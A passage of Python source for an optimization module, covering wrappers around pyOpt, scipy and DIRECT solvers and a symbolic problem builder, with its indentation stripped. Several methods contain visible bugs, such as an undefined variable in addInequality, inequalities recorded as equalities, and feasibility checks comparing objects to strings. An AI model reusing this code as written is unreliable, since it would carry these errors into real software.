#print "EVALUATING OBJECTIVE AT",x
fx = problem.objective(x)
eqs = [f(x) for f in problem.equalities]+[f(x) for f in problem.inequalities]
if len(eqs) == 0:
gx = []
else:
gx = np.hstack(eqs)
assert len(gx.shape)==1
gx = gx.tolist()
if problem.bounds is not None:
ub = (x-bmax)[ubIndices]
lb = (bmin-x)[lbIndices]
if len(gx) == 0:
gx = ub.tolist() + lb.tolist()
else:
gx = gx + ub.tolist() + lb.tolist()
#for f in problem.equalities:
# print "EQUALITY VALUE",f(x)
#for f in problem.inequalities:
# print "INEQUALITY VALUE",f(x)
flag = not any(not f(x) for f in problem.feasibilityTests)
#print "CONSTRAINTS",gx
#print "FUNCTION VALUE IS",fx
assert len(gx) == hlen+glen+len(ubIndices)+len(lbIndices)
flag = True
if any(math.isnan(v) for v in x):
return 0,[0]*len(gx),flag
return fx,gx,flag
opt_prob = pyOpt.Optimization('',objfunc)
opt_prob.addObj('f')
for i in range(len(self.seed)):
if problem.bounds is not None:
opt_prob.addVar('x'+str(i),'c',lower=bmin[i],upper=bmax[i],value=self.seed[i])
else:
opt_prob.addVar('x'+str(i),'c',value=self.seed[i])
hlen = sum(len(f(self.seed)) for f in problem.equalities)
glen = sum(len(f(self.seed)) for f in problem.inequalities)
opt_prob.addConGroup('eq',hlen,'e')
opt_prob.addConGroup('ineq',glen,'i')
#expressing bounds as inequalities
opt_prob.addConGroup('bnd',len(ubIndices)+len(lbIndices),'i')
opt = getattr(pyOpt,pyOptMethod)()
#opt.setOption('IPRINT', -1)
opt.setOption('IPRINT', -2)
opt.setOption('MAXIT',numIters)
opt.setOption('ACC',tol)
sens_type = 'FD'
if problem.objectiveGrad is not None:
#user provided gradients
if all(f is not None for f in problem.equalityGrads) and all(f is not None for f in problem.inequalityGrads):
#print "RETURNING GRADIENTS"
def objfuncgrad(x):
fx = problem.objectiveGrad(x)
gx = sum([f(x) for f in problem.equalityGrads]+[f(x) for f in problem.inequalityGrads],[])
for i in ubIndices:
zero = [0]*len(x)
zero[i] = 1
gx.append(zero)
for i in lbIndices:
zero = [0]*len(x)
zero[i] = -1
gx.append(zero)
flag = True
return fx,gx,flag
sens_type = objfuncgrad
else:
print("LocalOptimizer.solve(): Warning, currently need all or no gradients provided. Assuming no gradients.")
[fstr, xstr, inform] = opt(opt_prob,sens_type=sens_type)
if inform['value'] != 0:
return False,xstr.tolist()
f,g,flag = objfunc(xstr)
#flag doesn't check?
eqfeasible = all(abs(v)<tol for v in g[:hlen])
ineqfeasible = all(v <= 0 for v in g[hlen:hlen+glen])
boundfeasible = all(a<=x and x<=b for x,a,b in zip(xstr,problem.bounds[0],problem.bounds[1])) if problem.bounds is not None else True
feasible = eqfeasible and ineqfeasible and boundfeasible
if not feasible:
if not boundfeasible:
#try clamping
for i in range(len(xstr)):
xstr[i] = min(max(xstr[i],bmin[i]),bmax[i])
f,g,flag = objfunc(xstr)
boundfeasible = True
eqfeasible = all(abs(v)<tol for v in g[:hlen])
ineqfeasible = all(v <= 0 for v in g[hlen:hlen+glen])
feasible = eqfeasible and ineqfeasible and boundfeasible
if not feasible:
print("LocalOptimizer: Strange, pyOpt optimizer says successful and came up with an infeasible solution")
h = g[:hlen]
g = g[hlen:hlen+glen]
if not eqfeasible:
print(" Equality has max residual",max(abs(v) for v in h),"> tolerance",tol)
print(" Residual vector",h)
if not ineqfeasible:
print(" Inequality has residual",max(v for v in h),"> 0")
print(" Residual vector",g)
if not boundfeasible:
for i,(v,a,b) in enumerate(zip(x,bmin,bmax)):
if v < a or v > b:
print(" Bound %d: %f <= %f <= %f violated"%(i,a,v,b))
input("Press enter to continue >")
return feasible,xstr.tolist()
else:
raise RuntimeError('Invalid method specified: '+self.method)
def sample_range(a,b):
"""Samples x in the range [a,b].
* If the range is bounded, the uniform distribution x~U(a,b) is used.
* If the range is unbounded, then this uses the log transform to sample a distribution.
Specifically, if a=-inf and b is finite, then :math:`x \sim b + \log(y)` where
:math:`y \sim U(0,1)`. A similar formula holds for a finite and b=inf.
If a=-inf and b=inf, then :math:`x \sim s*\log(y)`, where `y \sim U(0,1)` and the sign
s takes on either of {-1,1} each with probability 0.5.
"""
x = random.uniform(a,b)
if math.isinf(x) or math.isnan(x):
try:
if math.isinf(a):
if math.isinf(b):
s = math.randint(0,1)*2-1
y = math.log(random.random())
return s*y
else:
y = math.log(random.random())
return b + y
elif math.isinf(b):
y = math.log(random.random())
return a - y
except ValueError:
#very, very small chance of this happening (2^-48)
return sample_range(a,b)
return x
class GlobalOptimizer:
"""A wrapper around different global optimization libraries. Only
minimization is supported, and only DIRECT, scipy, and pyOpt are supported.
The optimization technique is specified using the method string, which can be:
- 'auto': picks between DIRECT and random-restart
- 'random-restart.METHOD': random restarts using the local optimizer METHOD.
- 'DIRECT': the DIRECT global optimizer
- 'scipy': uses scipy.optimize.minimize with default settings.
- 'scipy.METHOD': uses scipy.optimize.minimize with the argument
method=METHOD.
- 'pyOpt': uses pyOpt with SLSQP.
- 'pyOpt.METHOD': uses pyOpt with the given method.
The method attribute can also be a list, which does a cascading solver
in which the previous solution point is used as a seed for the next
solver.
Examples:
- 'DIRECT': Run the DIRECT method
- 'scipy.differential_evolution': Runs the scipy differential evolution technique
- 'random-restart.scipy': Runs random restarts using scipy's default local optimizer
- 'random-restart.pyOpt.SLSQP': Runs random restarts using pyOpt as a local optimizer
- ['DIRECT','auto']: Run the DIRECT method then clean it up with the default local optimizer
Random restarts picks each component x of the seed state randomly using sample_range(a,b)
where [a,b] is the range of x given by problem.bounds.
DIRECT and scipy.differential_evolution require a bounded state space.
"""
def __init__(self,method='auto'):
if method == 'auto':
method = 'random-restart.scipy'
self.method = method
self.seed = None
def setSeed(self,x):
self.seed = x
def solve(self,problem,numIters=100,tol=1e-6):
"""Returns a pair (solved,x) where solved is True if the solver
found a valid solution, and x is the solution vector."""
if isinstance(self.method,(list,tuple)):
#sequential solve
seed = self.seed
for i,m in enumerate(self.method):
if hasattr(numIters,'__iter__'):
itersi = numIters[i]
else:
itersi = numIters
if hasattr(tol,'__iter__'):
toli = tol[i]
else:
toli = tol
print("GlobalOptimizer.solve(): Step",i,"method",m,'iters',itersi,'tol',toli)
if m == 'auto':
opt = LocalOptimizer(m)
else:
opt = GlobalOptimizer(m)
#seed with previous seed, if necessary
opt.setSeed(seed)
(succ,xsol)=opt.solve(problem,itersi,toli)
if not succ: return (False,xsol)
seed = xsol[:]
return ((seed is not None),seed)
elif self.method == 'scipy.differential_evolution':
from scipy import optimize
if problem.bounds == None:
raise RuntimeError("Cannot use scipy differential_evolution method without a bounded search space")
flattenedProblem = problem.makeUnconstrained(objective_scale = 1e-5)
res = optimize.differential_evolution(flattenedProblem.objective,list(zip(*flattenedProblem.bounds)))
print("GlobalOptimizer.solve(): scipy.differential_evolution solution:",res.x)
print(" Objective value",res.fun)
print(" Equality error:",[gx(res.x) for gx in problem.equalities])
return (True,res.x)
elif self.method == 'DIRECT':
import DIRECT
if problem.bounds == None:
raise RuntimeError("Cannot use DIRECT method without a bounded search space")
flattenedProblem = problem.makeUnconstrained(objective_scale = 1e-5)
minval = [float('inf'),None]
def objfunc(x,userdata):
v = flattenedProblem.objective(x)
if v < userdata[0]:
userdata[0] = v
userdata[1] = [float(xi) for xi in x]
return v
(x,fmin,ierror)=DIRECT.solve(objfunc,problem.bounds[0],problem.bounds[1],eps=tol,maxT=numIters,maxf=40000,algmethod=1,user_data=minval)
print("GlobalOptimizer.solve(): DIRECT solution:",x)
print(" Objective value",fmin)
print(" Minimum value",minval[0],minval[1])
print(" Error:",ierror)
print(" Equality error:",[gx(x) for gx in problem.equalities])
return (True,minval[1])
elif self.method.startswith('random-restart'):
import random
if problem.bounds == None:
raise RuntimeError("Cannot use method %s without a bounded search space"%(self.method,))
localmethod = self.method[15:]
lopt = LocalOptimizer(localmethod)
seed = self.seed
best = self.seed
print("GlobalOptimizer.solve(): Random restart seed is:",best)
fbest = (problem.objective(best) if (best is not None and problem.feasible(best)) else float('inf'))
for it in range(numIters[0]):
if seed is not None:
x = seed
seed = None
else:
x = [sample_range(a,b) for a,b in zip(*problem.bounds)]
print(" Solving from",x)
lopt.setSeed(x)
succ,x = lopt.solve(problem,numIters[1],tol)
print(" Result is",succ,x)
print(" Equality:",problem.equalityResidual(x))
if succ:
fx = problem.objective(x)
if fx < fbest:
fbest = fx
best = x
return (best is not None, best)
else:
assert self.seed is not None,"Pure local optimization requires a seed to be set"
opt = LocalOptimizer(self.method)
opt.setSeed(self.seed)
return opt.solve(problem,numIters,tol)
class OptimizerParams:
def __init__(self,numIters=50,tol=1e-3,
startRandom=False,numRestarts=1,
timeout=10,globalMethod=None,localMethod=None):
self.numIters=numIters
self.tol=tol
self.startRandom=startRandom
self.numRestarts=numRestarts
self.timeout = timeout
self.globalMethod = globalMethod
self.localMethod = localMethod
def toJson(self):
obj = dict()
for attr in ['numIters','tol','startRandom','numRestarts','timeout','globalMethod','localMethod']:
obj[attr] = getattr(self,attr)
return obj
def fromJson(self,obj):
for attr in ['numIters','tol','startRandom','numRestarts','timeout','globalMethod','localMethod']:
if attr in obj:
setattr(self,attr,obj[attr])
def solve(self,optProblem,seed=None):
"""Globally or locally solves an OptimizationProblem instance with the given parameters.
Optionally takes a seed as well. Basically, this is a thin wrapper around GlobalOptimizer
that converts the OptimizerParams to the appropriate format.
Returns (success,x) where success is True or False and x is the solution.
"""
method = self.globalMethod
numIters = self.numIters
if self.globalMethod == 'random-restart' or (self.globalMethod is None and (self.numRestarts > 1 or self.startRandom == False)):
#use the GlobalOptimize version of random restarts
assert self.localMethod is not None,"Need a localMethod for random-restart to work ('auto' is OK)"
if self.globalMethod is None:
method = 'random-restart' + '.' + self.localMethod
else:
method = self.globalMethod + '.' + self.localMethod
numIters = [self.numRestarts,self.numIters]
elif self.localMethod is not None:
if self.globalMethod is None:
method = self.localMethod
else:
#do a sequential optimization
method = [self.globalMethod,self.localMethod]
#co-opt self.numRestarts for the number of outer iterations?
numIters = [self.numRestarts,self.numIters]
optSolver = GlobalOptimizer(method=method)
if seed is not None:
optSolver.setSeed(seed)
(succ,res) = optSolver.solve(optProblem,numIters=numIters,tol=self.tol)
return (succ,res)
class OptimizationObjective:
"""
Describes an optimization cost function or constraint.
Attributes:
expr (symbolic.Expression): object f(x)
type (str): string describing what the objective does:
- 'cost': added to the cost. Must be scalar.
- 'eq': an equality f(x)=0 that must be met exactly (up to a given equality tolerance)
- 'ineq': an inequality constraint f(x)<=0
- 'feas': a black-box boolean feasibility test f(x) = True
soft (bool): if true, this is penalized as part of the cost function. Specifically
:math:`w \|f(x)\|^2` is the penalty for eq types, and w I[f(x)!=True] for feas types.
weight (float, optional): a weight, used only for cost or soft objectives
name (str, optional): a name for this objective.
"""
def __init__(self,expr,type,weight=None):
self.expr = expr
self.type = type
self.weight = weight
self.name = None
if weight is None or type == 'cost':
self.weight = 1
self.soft = False
else:
self.soft = True
class OptimizationProblemBuilder:
"""Defines a generalized optimization problem that can be saved/loaded from
a JSON string. Allows custom lists of objectives, feasibility tests, and cost functions.
Multiple variables can be optimized at once.
Attributes:
context (symbolic.Context): a context that stores the optimization variables and any user data.
objectives (list of OptimizationObjective): all objectives or cosntraints used in the optimization.
optimizationVariables (list of Variable): A list of Variables used for optimization. If not set,
this will try to find the variable 'x'. If not found, this will use all unbound variables in
the objectives.
Note that objectives must be symbolic.Function
objects, so that they are savable/loadable. See the documentation of the symbolic
module for more detail.
"""
def __init__(self,context=None):
if context is None:
context = symbolic.Context()
self.context = context
self.objectives = []
self.variableBounds = {}
def addEquality(self,f,weight=None):
"""If f is a symbolic.Function it's a function f(x) that evaluates to 0 for a
feasible solution. If it is a symbolic.Expression it's an expresion over
the optimization variables
If weight = None then this is an equality constraint, Otherwise
it gets added to the objective weight*||f(x)||^2."""
if isinstance(f,symbolic.Function):
assert len(self.optimizationVariables) > 0,"To add functions to constraints, the optimizationVariables object must be set"
return self.addEquality(f.context.bindFunction(f,self.optimizationVariables),weight)
else:
assert isinstance(f,symbolic.Expression)
self.objectives.append(OptimizationObjective(f,"eq",weight))
return self.objectives[-1]
def addInequality(self,f,weight=None):
"""Adds an inequality f(x) <= 0."""
if isinstance(obj,symbolic.Function):
assert len(self.optimizationVariables) > 0,"To add functions to constraints, the optimizationVariables object must be set"
return self.addInequality(self.context.bindFunction(f,self.optimizationVariables),weight)
else:
assert isinstance(f,symbolic.Expression)
self.objectives.append(OptimizationObjective(f,"eq",weight))
return self.objectives[-1]
def addCost(self,f,weight=1):
"""Adds a cost function f(q)."""
if isinstance(f,symbolic.Function):
assert len(self.optimizationVariables) > 0,"To add functions to constraints, the optimizationVariables object must be set"
return self.addCost(self.context.bindFunction(f,self.optimizationVariables))
else:
assert isinstance(f,symbolic.Expression)
self.objectives.append(OptimizationObjective(f,'cost',weight))
return self.objectives[-1]
def addFeasibilityTest(self,f,weight=None):
"""Adds an additional feasibility test."""
if isinstance(f,symbolic.Function):
return self.addFeasibilityTest(self.context.bindFunction(f,self.optimizationVariables),weight)
else:
assert isinstance(f,symbolic.Expression)
self.objectives.append(OptimizationObjective(f,'feas',weight))
return self.objectives[-1]
def setBounds(self,var,xmin=None,xmax=None):
"""Bounds the optimization variable var"""
if isinstance(var,symbolic.Variable):
var = var.name
if xmin is None and xmax is None:
if var in self.variableBounds:
del self.variableBounds[var]
else:
self.variableBounds[var] = (xmin,xmax)
def bind(self,**kwargs):
"""Binds the variables specified by the keyword arguments"""
for (k,v) in kwargs:
self.context.variableDict[k].bind(v)
def unbind(self,**kwargs):
"""Binds the variables specified by the keyword arguments"""
for (k,v) in kwargs:
self.context.variableDict[k].unbind()
return res
def bindVars(self,*args):
for x,v in zip(self.optimizationVariables,args):
x.bind(v)
def unbindVars(self):
for x in self.optimizationVariables:
x.unbind()
def getVarValues(self):
"""Saves the bindings for optimization variables in the current context into a list."""
return [v.value for v in self.optimizationVariables]
def setVarValues(self,s):
"""Converts a state into bindings for the optimization variables in the current context."""
for (v,var) in zip(s,self.optimizationVariables):
var.bind(v)
def getVarVector(self):
"""Flattens the bindings for optimization variables in the current context into a vector x."""
return symbolic._flatten(*[v.value for v in self.optimizationVariables])
def setVarVector(self,x):
"""Turns a vector x into bindings for the optimization variables in the current context."""
ofs=0
for v in self.optimizationVariables:
if v.type.is_scalar():
v.bind(x[ofs])
ofs += 1
else:
assert v.type.char == 'V',"TODO: handle matrix/array variables"
v.bind(x[ofs:ofs+v.type.size])
ofs += v.type.size
def randomVarBinding(self):
"""Samples values for all optimization variables, sampling uniformly according to their bounds"""
for k,bnds in self.variableBounds.items():
var = self.context.variableDict[k]
if var.type.is_scalar():
var.bind(sample_range(*bnds))
else:
var.bind([sample_range(a,b) for (a,b) in zip(*bnds)])
for var in self.optimizationVariables:
if var.name not in self.variableBounds:
infbnd = (-float('inf'),float('inf'))
if var.type.is_scalar():
var.bind(sample_range(*infbnd))
else:
assert v.type.char == 'V',"TODO: handle matrix/array variables"
assert var.type.size >= 0
var.bind([sample_range(*infbnd) for i in range(var.type.size)])
def cost(self):
"""Evaluates the cost function with the variables already bound."""
for v in self.optimizationVariables:
assert v.value is not None,"All optimization variables must be bound"
robset = False
csum = 0.0
for obj in self.objectives:
if obj.type == 'cost':
#print obj.weight,obj.expr.evalf(self.context)
csum += obj.weight*obj.expr.evalf(self.context)
elif obj.soft:
if obj.type == 'eq':
r = obj.expr.evalf(self.context)
csum += obj.weight*np.linalg.dot(r,r)
elif obj.type == 'feas':
if not obj.expr.evalf(self.context):
csum += obj.weight
elif obj.type == 'ineq':
raise NotImplementedError("Soft inequalities")
return csum
def equalityResidual(self,soft=True):
"""Evaluates the equality + ik functions at the currently bound state x, stacking the results
into a single vector. The residual should equal 0 (to a small tolerance) at a feasible
solution.
If soft=True, also stacks the soft equalities.
"""
for v in self.optimizationVariables:
assert v.value is not None,"All optimization variables must be bound"
robset = False
esum = []
for obj in self.objectives:
if obj.type == 'eq' and (not obj.soft or soft):
esum.append(obj.expr.evalf(self.context)*obj.weight)
return symbolic._flatten(*esum)
def satisfiesEqualities(self,tol=1e-3):
"""Returns True if every entry of the (hard) equality + IK residual equals 0 (to the tolerance tol)."""
res = self.equalityResidual()
if len(res) == 0: return True
return all(abs(r) <= tol for r in res)
def inequalityResidual(self,soft=False):
"""Evaluates the inequality functions at the currently bound state x, stacking the results
into a single vector. The residual should be <= 0 at a feasible
solution.
If soft=True then this includes the soft inequality residuals.
"""
for v in self.optimizationVariables:
assert v.value is not None,"All optimization variables must be bound"
robset = False
esum = []
for obj in self.objectives:
if obj.type == 'ineq' and (not obj.soft or soft):
esum.append(obj.expr.evalf(self.context)*obj.weight)
return symbolic._flatten(*esum)
def satisfiesInequalities(self,margin=0):
"""Returns True if the for currently bound state x, every entry of the (hard) inequality residuals is
<= -margin (default 0)."""
for v in self.optimizationVariables:
assert v.value is not None,"All optimization variables must be bound"
res = self.inequalityResidual()
if len(res) == 0: return True
return all(r <= -margin for r in res)
def feasibilityTestsPass(self,soft=False):
"""Returns True if the currently bound state passes all black-box feasibility tests."""
for v in self.optimizationVariables:
assert v.value is not None,"All optimization variables must be bound"
for obj in self.objectives:
if obj == 'feas' and (not obj.soft or soft):
r = obj.expr.evalf(self.context)
if not r: return False
return True
def inBounds(self):
"""Returns True if all bounded variables are within their ranges at the currently bound state x"""
for k,bnds in self.variableBounds.items():
var = self.context.variableDict[k]
assert var.value is not None,"All optimization variables must be bound"
xmin,xmax = bnds
if not symbolic_linalg.bound_contains(xmin,xmax,var.value).evalf():
return False
return True
def isFeasible(self,eqTol=1e-3):
"""Returns True if the currently bound state passes all equality, inequality, joint limit, and black-box feasibility
tests. Equality and IK constraints mut be met with equality tolerance eqTol."""
if not self.inBounds(): return False
res = self.equalityResidual()
if any(abs(r) > eqTol for r in res):
return False
res = self.inequalityResidual()
if any(r > 0 for r in res):
return False
if not self.feasibilityTestsPass(): return False
return True
def costSymbolic(self):
"""Returns a symbolic.Expression, over variables in self.context, that
evaluates to the cost"""
components = []
weights = []
for obj in self.objectives:
if obj.type == 'cost':
components.append(obj.expr)
weights.append(obj.weight)
elif obj.soft:
if obj.type == 'eq':
components.append(symbolic_linalg.dot(obj.expr,obj.expr))
weights.append(obj.weight)
elif obj.type == 'feas':
components.append(symbolic.if_(obj.expr,1,0))
weights.append(obj.weight)
else:
raise NotImplementedError("Soft inequalities")
if len(components)==0:
return None
oldvals = self.getVarValues()
self.unbindVars()
res = symbolic.simplify(symbolic.weightedsum(*(components + weights)),self.context)
self.setVarValues(oldvals)
return res
#return symbolic.weightedsum(*(components + weights))
def equalityResidualSymbolic(self,soft=False):
"""Returns a symbolic.Expression, over variables in self.context, that
evaluates to the equality residual"""
components = []
for obj in self.objectives:
if obj.type == 'eq' and (not obj.soft or soft):
components.append(obj.expr*obj.weight)
if len(components) == 0: return None
oldvals = self.getVarValues()
self.unbindVars()
res = symbolic.simplify(symbolic.flatten(*components),self.context)
self.setVarValues(oldvals)
return res
def inequalityResidualSymbolic(self,soft=False):
"""Returns a symbolic.Expression, over variables in self.context, that
evaluates to the inequality residual"""
components = []
for obj in self.objectives:
if obj.type == 'ineq' and (not obj.soft or soft):
components.append(obj.expr*obj.weight)
if len(components) == 0: return None
oldvals = self.getVarValues()
self.unbindVars()
res = symbolic.simplify(symbolic.flatten(*components),self.context)
self.setVarValues(oldvals)
return res
def equalitySatisfiedSymbolic(self,tol=1e-3,soft=False):
"""Returns a symbolic.Expression, over variables in self.context, that
evaluates to True if the equality constraint is met with tolerance tol"""
res = self.equalityResidualSymbolic(soft)
if res is None: return None
return symbolic.abs_(res) <= tol
def inequalitySatisfiedSymbolic(self,soft=False):
"""Returns a symbolic.Expression, over variables in self.context, that
evaluates to True if the inequality constraint is met"""
res = self.inequalityResidualSymbolic(soft)
if res is None: return None
return res <= 0
def feasibilityTestsPassSymbolic(self,soft=False):
"""Returns a symbolic.Expression, over variables in self.context, that
evaluates to True if the black-box feasibility constraints are met"""
components = []
for obj in self.objectives:
if obj == 'feas' and (not obj.soft or soft):
components.append(obj.expr)
if len(components) == 0: return None
oldvals = self.getVarValues()
self.unbindVars()
res = symbolic.simplify(symbolic.all_(*components),self.context)
self.setVarValues(oldvals)
return res
def inBoundsSymbolic(self):
"""Returns a symbolic.Expression, over variables in self.context, that
evaluates to True the configuration meets bound constraints"""
exprs = []
for k,bnd in self.variableBounds.items():
exprs.append(self.context.linalg.bound_contains(qmin,qmax,self.context.get(k)))
return symbolic.all_(*exprs)
def isFeasibleSymbolic(self,eqTol=1e-3):
"""Returns a symbolic.Expression, over $q and other user data variables, that
evaluates to True if the configuration meets all feasibility tests"""
tests = [self.inBoundsSymbolic(),self.equalitySatisfiedSymbolic(eqTol),self.inequalitySatisfiedSymbolic(),self.feasibilityTestsPassSymbolic()]
return symbolic.all_(*[t for t in tests if t is not None])
def score(self,eqWeight=1.0,ineqWeight=1.0,infeasWeight=1.0):
"""Returns an error score that is equal to the optimum at a feasible
solution. Evaluated at the currently bound state x."""
c = self.cost()
if eqWeight != 0:
res = self.equalityResidual()
if len(res) > 0:
c += eqWeight*vectorops.norm(res)
if ineqWeight != 0:
res = self.inequalityResidual()
if len(res) > 0:
c += ineqWeight*vectorops.norm(res)
if infeasWeight != 0:
for obj in self.objectives:
if obj == 'feas' and not obj.soft:
if not obj.expr.eval():
c += infeasWeight
if not self.inBounds():
c += infeasWeight
return c
def pprint(self,indent=0):
ncost = len([obj for obj in self.objectives if obj.type == "cost" or obj.soft])
istring = " "*indent
if ncost == 0:
print("%sfind[%s]"%(istring,",".join([v.name for v in self.optimizationVariables])))
else:
print("%smin[%s] %s"%(istring,",".join([v.name for v in self.optimizationVariables]),str(self.costSymbolic())))
if ncost < len(self.objectives) or len(self.variableBounds) > 0:
print("%s such that"%(istring,))
for obj in self.objectives:
if not(obj.type == "cost" or obj.soft):
print("%s%s%s"%(istring,("" if obj.name is None else obj.name+": "),str(obj.expr)), end=' ')
if obj.type == "eq":
print("= 0")
elif obj.type == "ineq":
print("<= 0")
else:
print("holds")
for k,v in self.variableBounds.items():
if hasattr(v[0],'__iter__'):
for i in range(len(v[0])):
print("%s[%f]\t"%(istring,v[0][i]), end=' ')
if i == len(v[0])/2:
print("<=",k,"<=\t", end=' ')
else:
print("\t", end=' ')
print("[%f]"%(v[1][i],))
else:
print("%s%f <= %s <= %f"%(istring,v[0],k,v[1]))
def toJson(self,saveContextFunctions=False,prettyPrintExprs=False):
"""Returns a JSON object representing this optimization problem.
Args:
saveContextFunctions (bool, optional): if True, saves all custom functions in
self.context. If they are saved, then the current context is required to be
the same context in which the problem is loaded.
prettyPrintExprs (bool, optional): if True, prints expressions more nicely as more
human-readable strings rather than JSON objects. These strings are parsed on load,
which is a little slower than pure JSON.
"""
res = dict()
res['type'] = 'OptimizationProblemBuilder'
res['context'] = symbolic_io.contextToJson(self.context,saveFunctions=saveContextFunctions)
objectivesJson = []
for o in self.objectives:
if prettyPrintExprs:
ojson = {'expr':symbolic_io.exprToStr(o.expr,parseCompatible=True),'type':o.type,'soft':o.soft,'weight':o.weight,'name':o.name}
else:
ojson = {'expr':symbolic_io.exprToJson(expr),'type':o.type,'soft':o.soft,'weight':o.weight,'name':o.name}
objectivesJson.append(ojson)
res['objectives'] = objectivesJson
res['optimizationVariables'] = [v.name for v in self.optimizationVariables]
res['variableBounds'] = self.variableBounds
return res
def fromJson(self,object,context=None):
"""Sets this IK problem to a JSON object representing it. A ValueError
is raised if it is not the correct type."""
if object['type'] != 'OptimizationProblemBuilder':
raise ValueError("Object must have type OptimizationProblemBuilder")
if context is not None:
self.context = context
else:
symbolic_io.contextFromJson(self.context,object['context'])
self.objectives = []
for ojson in object['objectives']:
if isinstance(ojson['expr'],str):
expr = symbolic_io.exprFromStr(self.context,ojson['expr'])
else:
expr = symbolic_io.exprFromJson(self.context,ojson['expr'])
self.objectives.append(OptimizationObjective(expr,ojson['type'],(ojson['weight'] if ojson['soft'] else None)))
self.objectives[-1].name = ojson['name']
self.optimizationVariables = []
for n in object['optimizationVariables']:
assert n in self.context.variableDict,"Context does not contain optimization variable "+n
self.optimizationVariables.append(self.context.variableDict[n])
self.variableBounds = object['variableBounds']
return
def preprocess(self,steps='all'):
"""Preprocesses the problem to make solving more efficient
Returns:
tuple: (opt,optToSelf,selfToOpt)
- opt: a simplified version of this optimization problem. If no simplfication can be performed, opt = self
- optToSelf: a map of opt's variables to self's variables. If no simplification can be performed, optToSelf = None
- selfToOpt: a map of self's variables to opts's variables. If no simplification can be performed, selfToOpt = None
Specific steps include:
# delete any objectives with 0 weight
# delete any optimization variables not appearing in expressions
# fixed-bound (x in [a,b], with a=b) variables are replaced with fixed values.
# simplify objectives
# TODO: replace equalities of the form var = expr by matching var to expr?
If optToSelf is not None, then it is a list of Expressions that, when eval'ed, produce the values of the corresponding
optimizationVariables in the original optimization problem. selfToOpt performs the converse mapping.
In other words, if opt has bound values to all of its optimizationVariables, the code::
for var,expr in zip(self.optimizationVariables,optToSelf):
var.bind(expr.eval(opt.context))
binds all optimization variables in self appropriately.
"""
modified = False
result = OptimizationProblemBuilder(self.context)
result.optimizationVariables = []
optToSelf = []
selfToOpt = []
for v in self.optimizationVariables:
if v.name not in self.variableBounds:
result.optimizationVariables.append(v.name)
optToSelf.append(symbolic.expr(result.context.variableDict[v.name]))
selfToOpt.append(symbolic.expr(v))
else:
xmin,xmax = self.variableBounds[v.name]
if v.type.is_scalar():
if xmin == xmax:
#remove from optimization
if not modified:
result.context = self.context.copy()
modified = True
result.variableDict[v.name].bind(xmin)
else:
assert v.type.char == 'V',"TODO: handle non numeric/vector valued variables, type %s"%(v.type,)
activeDofs = []
inactiveDofs = []
for i in range(len(xmin)):
if xmin[i] == xmax[i]:
inactiveDofs.append(i)
else:
activeDofs.append(i)
if len(activeDofs) == 0:
if not modified:
result.context = self.context.copy()
modified = True
result.context.variableDict[v.name].bind(xmin)
#don't add to optimization variables
print("OptimizationProblemBuilder.preprocess(): No active DOFS on",v.name,"removing from optimization variables")
print(" xmin",xmin,"xmax",xmax)
elif len(inactiveDofs) > 0:
if not modified:
result.context = self.context.copy()
modified = True
vact = result.context.variableDict[v.name]
vact.type.size = len(activeDofs)
assert any(vact is v for v in result.context.variables)
if v.value is not None:
vact.value = [v.value[d] for d in activeDofs]
vlift = symbolic.setitem(xmin,activeDofs,vact)
result.optimizationVariables.append(v.name)
optToSelf.append(vlift)
selfToOpt.append(symbolic.getitem(v,activeDofs))
if v.name in self.variableBounds:
vmin,vmax = self.variableBounds[v.name]
result.setBounds(v.name,[vmin[d] for d in activeDofs],[vmax[d] for d in activeDofs])
else:
result.optimizationVariables.append(v.name)
if v.name in self.variableBounds:
vmin,vmax = self.variableBounds[v.name]
result.setBounds(v.name,vmin,vmax)
optToSelf.append(symbolic.expr(result.context.variableDict[v.name]))
selfToOpt.append(symbolic.expr(v))
#print "OptimizationProblemBuilder.preprocess(): optimization variables",[str(v) for v in self.optimizationVariables],"->",[str(v) for v in result.optimizationVariables]
assert modified != (len(optToSelf) == 0 and len(result.optimizationVariables) == len(self.optimizationVariables))
#delete any objectives with 0 weight
sourceObjectives = self.objectives
if any(obj.weight==0 for obj in self.objectives):
modified = True
sourceObjectives = [obj for obj in self.objectives if obj.weight != 0]
if not modified:
return self,None,None
#convert names to Variables
result.optimizationVariables = [result.context.variableDict[vname] for vname in result.optimizationVariables]
#simplify and remap expressions
oldVals = self.getVarValues()
for var in self.optimizationVariables:
var.unbind()
for i,obj in enumerate(sourceObjectives):
expr = symbolic.simplify(obj.expr,result.context)
for var,vexpr in zip(result.optimizationVariables,optToSelf):
try:
expr = expr.replace(var,vexpr)
except ValueError:
pass
#print "Replacement for",obj.type,"objective",obj.expr,"is",expr
expr = symbolic.simplify(expr)
#print " simplified to",expr
#raw_input()
result.objectives.append(OptimizationObjective(expr,obj.type,obj.weight))
result.objectives[-1].soft = obj.soft
result.objectives[-1].name = obj.name
self.setVarValues(oldVals)
return (result,optToSelf,selfToOpt)
def getBounds(self):
"""Returns optimization varable bounds as a list of (xmin,xmax) pairs. None is returned if the
problem is unconstrained"""
inf = float('inf')
if len(self.variableBounds) == 0 or not any(v.name in self.variableBounds for v in self.optimizationVariables):
return None
return [self.variableBounds.get(v.name,((-inf,inf) if v.type.is_scalar() else ([-inf]*v.type.size,[inf]*v.type.size))) for v in self.optimizationVariables]
def getProblem(self):
"""Returns an OptimizationProblem instance over the optimization variables.
"""
optProblem = OptimizationProblem()
eq = self.equalityResidualSymbolic()
ineq = self.inequalityResidualSymbolic()
feas = self.feasibilityTestsPassSymbolic()
cost = self.costSymbolic()
if len(self.optimizationVariables) == 0:
if 'x' in self.context.variableDict:
self.optimizationVariables = self.context.variableDict['x']
else:
raise NotImplementedError("No optimization variables set; dynamic interpretation not complete yet")
#to prevent simplification from destroying variable references, save the values and unbind them...
oldValues = self.getVarValues()
self.unbindVars()
if eq is not None: optProblem.addSymbolicConstraint((symbolic.simplify(eq,self.context) == 0),self.context,self.optimizationVariables)
if ineq is not None: optProblem.addSymbolicConstraint((symbolic.simplify(ineq,self.context) <= 0),self.context,self.optimizationVariables)
if feas is not None: optProblem.addSymbolicConstraint(symbolic.simplify(feas,self.context),self.context,self.optimizationVariables)
if cost is not None: optProblem.setSymbolicObjective(symbolic.simplify(cost,self.context),self.context,self.optimizationVariables)
vbounds = self.getBounds()
if vbounds is not None:
aggxmin = symbolic._flatten(*[bmin for (bmin,bmax) in vbounds])
aggxmax = symbolic._flatten(*[bmax for (bmin,bmax) in vbounds])
optProblem.setBounds(aggxmin,aggxmax)
#restore unbound variables
self.setVarValues(oldValues)
return optProblem
def solve(self,params=OptimizerParams(),preprocess=True,cache=False):
